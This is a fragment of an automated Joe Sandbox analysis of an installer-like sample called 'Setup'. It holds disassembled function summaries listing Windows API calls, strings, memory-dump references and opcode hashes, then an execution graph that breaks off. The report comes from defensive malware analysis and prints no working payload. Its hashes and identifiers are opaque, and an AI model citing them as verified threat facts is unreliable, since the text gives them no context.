                                                                                                                                        • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                          • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                          • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                        • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                        • String ID: CopyFiles "%s"->"%s"
                                                                                                                                        • API String ID: 2577523808-3778932970
                                                                                                                                        • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                        • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                        • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                                                                        • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcatwsprintf
                                                                                                                                        • String ID: %02x%c$...
                                                                                                                                        • API String ID: 3065427908-1057055748
                                                                                                                                        • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                        • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                        • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                        • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                        APIs
                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                          • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                        • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                        • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                        • API String ID: 2266616436-4211696005
                                                                                                                                        • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                        • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                        • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                        • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                        APIs
                                                                                                                                        • GetDC.USER32(?), ref: 00402100
                                                                                                                                        • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,759223A0,00000000), ref: 00406902
                                                                                                                                        • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                          • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1599320355-0
                                                                                                                                        • Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                        • Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
                                                                                                                                        • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                        • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                        • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                        • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                        • String ID: Version
                                                                                                                                        • API String ID: 512980652-315105994
                                                                                                                                        • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                        • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                        • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                        • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                        APIs
                                                                                                                                        • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                        • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                        • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2102729457-0
                                                                                                                                        • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                        • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                        • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                        • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                        APIs
                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2883127279-0
                                                                                                                                        • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                        • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                        • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                        • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                        APIs
                                                                                                                                        • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                        • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                          • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3748168415-3916222277
                                                                                                                                        • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                        • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                        • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                        • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                        APIs
                                                                                                                                        • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                        • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PrivateProfileStringlstrcmp
                                                                                                                                        • String ID: !N~
                                                                                                                                        • API String ID: 623250636-529124213
                                                                                                                                        • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                        • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                        • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                        • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                        APIs
                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                        Strings
                                                                                                                                        • Error launching installer, xrefs: 00405C74
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateHandleProcess
                                                                                                                                        • String ID: Error launching installer
                                                                                                                                        • API String ID: 3712363035-66219284
                                                                                                                                        • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                        • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                        • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                        • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                        APIs
                                                                                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                        • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                          • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                        • API String ID: 3509786178-2769509956
                                                                                                                                        • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                        • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                        • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                        • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                        APIs
                                                                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                        • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                        • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.2025162505.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.2025133422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025200167.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025216498.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.2025386648.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_'Setup.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 190613189-0
                                                                                                                                        • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                        • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                        • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                        • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:4.1%
                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                        Signature Coverage:2.1%
                                                                                                                                        Total number of Nodes:2000
                                                                                                                                        Total number of Limit Nodes:88
                                                                                                                                        execution_graph 97763 54dcb4 97768 530fe6 97763->97768 97765 54dcbb 97766 514e77 97765->97766 97778 575f90 97765->97778 97771 530fee 97768->97771 97770 531008 97770->97765 97771->97770 97773 53100c std::exception::exception 97771->97773 97786 53593c 97771->97786 97803 5335d1 DecodePointer 97771->97803 97804 5387cb RaiseException 97773->97804 97775 531036 97805 538701 58 API calls _free 97775->97805 97777 531048 97777->97765 97779 575fb3 97778->97779 97780 576066 97779->97780 97781 530fe6 Mailbox 59 API calls 97779->97781 97780->97766 97782 575fef 97781->97782 97785 57600e 97782->97785 97818 576071 59 API calls 97782->97818 97785->97780 97814 521c9c 97785->97814 97787 5359b7 97786->97787 97793 535948 97786->97793 97812 5335d1 DecodePointer 97787->97812 97789 5359bd 97813 538d58 58 API calls __getptd_noexit 97789->97813 97792 53597b RtlAllocateHeap 97792->97793 97802 5359af 97792->97802 97793->97792 97795 535953 97793->97795 97796 5359a3 97793->97796 97800 5359a1 97793->97800 97809 5335d1 DecodePointer 97793->97809 97795->97793 97806 53a39b 58 API calls __NMSG_WRITE 97795->97806 97807 53a3f8 58 API calls 5 library calls 97795->97807 97808 5332cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 97795->97808 97810 538d58 58 API calls __getptd_noexit 97796->97810 97811 538d58 58 API calls __getptd_noexit 97800->97811 97802->97771 97803->97771 97804->97775 97805->97777 97806->97795 97807->97795 97809->97793 97810->97800 97811->97802 97812->97789 97813->97802 97815 521ca7 97814->97815 97816 521caf 97814->97816 97819 521bcc 97815->97819 97816->97785 97818->97782 97820 521bdc 97819->97820 97822 521bef _memmove 97819->97822 97821 530fe6 Mailbox 59 API calls 97820->97821 97820->97822 97821->97822 97822->97816 97823 511055 97828 512a19 97823->97828 97838 521207 97828->97838 97832 512b24 97833 51105a 97832->97833 97846 5113f8 59 API calls 2 library calls 97832->97846 97835 532f70 97833->97835 97854 532e74 97835->97854 97837 511064 97839 530fe6 Mailbox 59 API calls 97838->97839 97840 521228 97839->97840 97841 530fe6 